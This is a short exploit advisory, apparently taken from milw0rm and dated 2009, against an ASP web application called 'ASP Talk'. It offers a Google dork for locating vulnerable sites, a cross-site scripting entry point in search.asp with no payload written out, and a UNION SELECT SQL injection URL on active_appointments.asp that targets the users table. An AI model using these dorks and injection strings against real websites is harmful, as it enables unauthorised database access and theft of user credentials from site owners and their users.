000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000 [+] Script : ASP Talk [+] Exploit Type : Multiple Exploits (SQL/CSS) [+] Google Dork : intitle:"ASP inline corporate calendar" inurl:.asp?id= [+] Contact : blackbeard-sql A.T hotmail.fr --//--> Exploit : 1)Cross site scripting : http://[website]/[script]/search.asp?keyword=&SearchIn=All post = 2) Remote sql injection Exploit : http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users [peace xD] # milw0rm.com [2009-05-21]